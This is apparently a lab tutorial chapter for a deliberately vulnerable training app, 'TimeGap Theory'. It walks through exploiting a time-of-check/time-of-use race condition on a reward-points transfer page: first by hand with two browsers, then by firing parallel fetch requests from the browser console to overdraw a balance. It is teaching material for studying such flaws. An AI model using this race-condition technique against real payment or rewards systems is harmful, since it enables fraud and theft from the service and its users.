Challenge 3 – Transfer
Transfer reward points between users.
Last updated
Transfer reward points between users.
Last updated
Transferring rewards is not something we do every day. But sending money is. Think of the transfer rewards as sending money. The basic functionality is identical.
Let us look at a sample transfer rewards flow:
There are three conditions to be met for the transaction to be successful:
Transaction amount should be a positive number
Payer and payee can not be same
Payers should have enough balance in their account
Let us see if the application is performing those checks. Go to the Sign up page and create two user accounts - Tom and Jerry
Transaction amount should be a positive number:
Go to the Transfer page
Put in a negative number in the amount field
Click on the Transfer button
Payer and payee can not be same:
Go to the Transfer page
Select the same user as payer and payee
Put in a 10 as the amount
Click on the Transfer button
Payer should have enough balance in their account:
Go to the Transfer page
Select a payer and payee
Put in a 300 as the amount
Click on the Transfer button
Let us visualize the happy path with the help of a sequence diagram:
Our aim is to bypass the business logic and send more reward amounts than we have. How can we do that? We need to make multiple transactions before the application deducts it from the balance.
It’s time to slow down TimeGap Theory:
On your browser, navigate to the Settings page
Change the time delay to 5 seconds
Click on the Save button
Now, TimeGap Theory will wait 5 seconds before every database write operation.
Preparation phase
Open two browsers side by side (Use private/incognito window if you do not have two browsers)
On both the browsers:
Navigate to the Login page
Click on the first user button - this will fill the form with details of the user Tom
Navigate to the Transfer rewards page
If the account has 100 points as balance, put a lesser amount as the transfer value on both the browsers. Say, 90
Select Tom as the payer
Select Jerry as the payee
Note down the balance on Jerry’s account ( which is displayed in simple bracket)
Alright, the preparation is done. Here comes the exploitation phase.
Exploitation phase
Click on the Transfer button on the first browser
Go to the second browser as fast as you can
Click on the Transfer button on the second browser
There comes our third and final phase:
Post-exploitation phase
Let us wait for both the browsers to complete the request
You can see that the transfer operations were successful on both the browsers
Check the balance of user Jerry
Phew. You transferred more points from Tom’s account that what they had
If you check your scores, you will see that you have got 100 points for transfer challenge
Don't forget to change the delay to back to 0 on the Settings page
Let’s try and automate this.
First, we need a valid fetch request:
Open your browser ( Chrome or Firefox)
Navigate to TimeGap Theory > Login
Click on the first user button. This will fill the user details for user Tom
Click on the login button
Navigate to TimeGap Theory > Webapp > User > Transfer rewards
Click on the first $10 from Tom to Jerry button. This will fill the form with some transfer details.
Open up dev tools by pressing F12 on the browser
On Windows, you can use Ctrl + Shift + I
On Mac, you can use Cmd + Shift + I
Click on the Transfer button
On the browser dev tools, click on the Network tab
Right click on the transfer-rewards.php request
Click on Copy > Copy as fetch
Paste that on the Console tab of the browser dev tools. You will get something like the following:
Again, don’t worry if you see a slightly bigger request. That is just your browser being naughty. You can use that request as it is, or use the one shown above.
Now we have a request.
And we need two requests.
It can be done by copy-pasting the fetch request without pressing the Enter key. However, it’s a good practice to separate each request with a comma. Let us do that
Before running this new command, we need to clear the slate. It involves two simple steps:
Ensure that there is no delay
Go to TimeGap Theory > Settings
Ensure that the Main wait is set to 0
Clear the current score
Go to TimeGap Theory > Score
Click on the Clear button
Alright, our slate is clear. Let us execute the attack now:
Enter the combined fetch requests on the Console tab of browser dev tools
Click on the To field to see the rewards on each account
Now you see a negative value in Tom’s account
You also see corresponding change in Jerry’s account
Go to TimeGap Theory > Score
Check if you got points for completing the Transfer rewards challenge
What would be the business impact of such an attack? Depending on how the app is designed, there are several possibilities:
A user may start a huge number of parallel requests. They may transfer this boat load of money/points to an account controlled by them or by their friends/relatives
Attacker may work with friends to perform these transactions back and forth infinite amount of times
Let us review what we did:
The transfer rewards page is performing basic checks to prevent abuse
One of these checks includes checking the payer’s account to see if they have sufficient balance
You analyzed this behavior by trying to transfer more points than what you have in balance
First, you slowed down the system and bypassed the business logic
Then you bypassed the business logic by using browser dev tools
You must have noticed during the automation phase that accessing the transfer-rewards page does not require authentication.
If you manually enter the transfer-rewards page URL on your browser, you will be able to access this page without logging in first
This made the TOCTOU exploitation slightly easy. No need to worry. In upcoming chapters, you will learn how to exploit TOCTOU issues in authenticated pages as well.
Now you know how TOC/TOU security issues can affect money/points transfer pages